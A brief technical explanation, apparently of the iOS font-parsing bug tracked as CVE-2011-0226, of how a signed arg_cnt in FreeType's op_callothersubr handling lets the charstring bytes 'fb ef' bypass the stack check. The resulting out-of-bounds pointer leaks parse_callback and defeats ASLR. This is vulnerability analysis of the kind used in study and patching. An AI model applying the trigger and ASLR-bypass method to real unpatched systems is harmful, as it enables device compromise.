When dealing with op_callothersubr, arg_cnt is defined as an integer. arg_cnt is read from decoder‑>stack, which could be set to
0xfea50000 by charstring "fb ef". And this will bypass stack checking. Then "top ‑= arg_cnt" will make top point to data outside of decoder‑>stack. Actually it points to decoder‑>parse_callback. decoder‑>parse_callback address minus default address of that function to get ASLR offset. That's how it bypasses ASLR.
When Apple released iOS 4.2.9/4.3.4 to patch this vulnerability, it received a different CVE identifier (CVE-2011-0226).